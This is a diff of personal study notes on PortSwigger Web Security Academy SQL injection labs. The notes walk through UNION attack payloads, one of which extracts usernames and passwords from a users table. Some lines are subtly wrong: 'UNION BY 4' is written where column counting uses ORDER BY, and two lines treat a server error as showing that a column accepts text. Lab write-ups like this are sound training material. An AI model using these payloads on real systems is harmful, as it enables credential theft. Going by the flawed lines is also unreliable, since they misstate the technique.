IOxCyber/CyberEssentials/Security-Tools/Burp_Suite/PortSwigger-WebSecAcad/Web_Vuln-Insights/SQL Injection/SQLi_Labs.md

 - Second, Determine a column that is compatible with string data.

 - Original Query: `SELECT * FROM products WHERE category = 'Gifts'`
-- Modified: `SELECT * FROM products WHERE category = 'Gifts' UNION BY 4--` (Server Error, means number of columns = 3)
+- Modified: `SELECT * FROM products WHERE category = 'Gifts'+UNION+BY+4--` (Server Error, means number of columns = 3)
 - Modified: `SELECT * FROM products WHERE category = 'Gifts'+UNION+SELECT+'a',NULL,NULL--` (Server Error, means this column accepting text value)
 - Modified: `SELECT * FROM products WHERE category = 'Gifts'+UNION+SELECT+NULL,NULL,'a'--` (Server Error, means this column accepting text value)
 - Modified: `SELECT * FROM products WHERE category = 'Gifts'+UNION+SELECT+NULL,'a',NULL--` ('a' determine that the 2nd column accepting text value)

-## Lab 6: SQL injection UNION attack, retrieving data from other tables [Link](https://portswigger.net/web-security/learning-paths/sql-injection/sql-injection-using-a-sql-injection-union-attack-to-retrieve-interesting-data/sql-injection/union-attacks/lab-retrieve-data-from-other-tables#)
+## Lab 6: SQL injection UNION attack, `retrieving data from other tables` [Link](https://portswigger.net/web-security/learning-paths/sql-injection/sql-injection-using-a-sql-injection-union-attack-to-retrieve-interesting-data/sql-injection/union-attacks/lab-retrieve-data-from-other-tables#)

 - Original Query: `SELECT * FROM products WHERE category = 'Gifts'`
 - Modified: `SELECT * FROM products WHERE category = 'Gifts'UNION+SELECT+username,password+FROM+users--` This should return all the users available in USERS table.
 (Since, table and columns name were given in Lab description.
 We can take it from there)